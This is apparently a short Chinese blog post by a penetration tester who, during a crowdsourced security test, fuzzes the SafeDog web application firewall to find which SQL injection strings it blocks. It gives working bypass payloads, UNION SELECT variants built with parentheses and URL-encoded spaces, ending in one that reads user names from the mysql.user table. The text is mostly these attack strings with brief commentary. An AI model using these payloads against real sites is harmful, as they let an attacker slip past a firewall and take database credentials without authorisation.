一次众测发现个注入,然后有安全狗就顺带看了下安全狗。
先fuzz看看安全狗拦截什么关键词
union select x,x 拦截 尝试用union函数 union(select 1,2,3) 拦截
union(%20select 1,2,3,4) 不拦截,注意select前面有个空格。
之前出题的代码...懒得改了…中二。 union(%20select%201,(select%20user%20from%20mysql.user),3,4) 没有from就不算绕过,尝试用from注入被拦截。 union(%20select%201,(select%20user%20from(mysql.user)),3,4) 尝试把from换成函数,被拦截了。
想起来之前绕union函数前面带的空格,这里也尝试了下
union(%20select%201,(select%20user%20from(%20mysql.user)%20limit%202,1),3,4) 注意from函数里面第一位就是空格 实际上还有很多过狗的方法,不是这个payload,那个payload还要长很多,但是重要的是过程,我再研究了下,发现这个payload比较短点
|